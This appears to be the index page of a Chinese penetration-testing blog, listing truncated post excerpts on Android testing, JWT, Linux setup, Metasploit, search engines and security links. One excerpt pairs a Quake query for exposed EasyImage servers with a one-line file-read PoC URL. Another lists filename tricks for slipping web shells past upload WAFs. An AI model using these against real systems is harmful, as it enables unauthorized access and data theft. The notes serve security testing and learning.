安卓渗透测试环境准备 前言 用公司的经费买了部pixel 3,简单的写一下怎么搭建一个抓包的环境,咕咕咕了好久,总算想起来写一下。手机记得买能解锁的,不能解锁的不要买,一般来说卖家会帮你你解锁好,就算没帮你解锁自己解锁也是很简单的。 配置抓包环境 0x01 基础 搞安卓至少你的会adb和fastboot一些基础命令,adb工具包下载链接:https://developer.android.com/studio/rele 2023-06-05 #刷机 #移动安全
渗透测试中jwt的应用 什么是jwt JSON Web Token (JWT,RFC 7519 (opens new window)),是为了在网络应用环境间传递声明而执行的一种基于 JSON 的开放标准((RFC 7519)。该 token 被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT 的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增 2023-05-31 #jwt
hacktricks https://book.hacktricks.xyz/ https://www.ired.team/ https://pentester.land/ https://github.com/reddelexc/hackerone-reports/blob/master/tops_100/TOP100PAID.md https://offsec.tools/ 2023-05-30 #tricks
书签分享 信安资讯 安全文摘 - 『代码审计』知识星球 Paper 安全客 - 有思想的安全新媒体 先知社区 FreeBuf互联网安全新媒体平台 | 关注黑客与极客 看雪安全论坛 技术文章的最新主题 - 90Sec 暗月知识中心 SecIN信息安全技术社区 青衣十三楼 Hacking8 安全信息流 跳跳糖 洞见微信聚合-安全圈微信搜索_订阅号及文章内容收录,一搜即达 渗透师 网络安全从业者安全导航 安全 2023-05-29 #书签
Linux配置速查 0x00 好多配置记不住,每次都要Google去查一下,不如记下来,省的下次再去查。 0x01 Linux下配置path 修改/etc/profile文件,修改找个文件是全局生效,不受bash/zsh影响 1export PATH="$HOME/bin:$PATH" fish修改环境变量: 打开你的 fish 配置文件: 1nano ~/.config/fish/config 2023-05-24 #Linux
metasploit使用笔记 0x00 Linux安装 1curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall & 2023-05-16 #metasploit #shell
简单图床任意文件读取 quake语法 1app:"EasyImage" Poc 1/application/down.php?dw=./config/config.php 2023-05-15 #exp
quake使用笔记 前言 国内搜索引擎越来越多,fofa,hunter,zoomeye,当然也包括quake,当初是看重他的漏洞库才开的会员,奈何不向普通会员开放,那要你有啥用,不过买都买了,不如就了解如何去正常如使用他。 搜索语法 官方的文档:https://quake.360.net/quake/#/help?id=5eb238f110d2e850d5c6aec8&title=%E6%A3%80%E7%B 2023-04-17 #quake #网络空间搜索引擎
文件上传绕过waf姿势收集 前言 现在渗透测试基本都会遇到waf,有waf就会封ip,有waf就要fuzz,记录一下从网上收集到的常用的文件上传的姿势,不一定能用,说不定下次就遇到了呢。 正文 后缀绕过 白名单基本没戏,洗洗睡吧。记录一下遇到的黑名单绕过。 jsp 1.jpg\.jsp/ 以下内容可以尝试换行试一下 filename='shell.jspx.jsp' filename=shell.jspx.jsp file 2023-03-23 #waf #bypass
AI相关 链接 https://chat.openai.com/chat 貌似是通过udp判断IP,建议使用美国的IP https://www.bing.com/new 国内要使用插件修改header,貌似dev不用 https://bard.google.com/ https://yiyan.baidu.com/welcome https://tongyi.aliyun.com/ 2023-03-22 #AI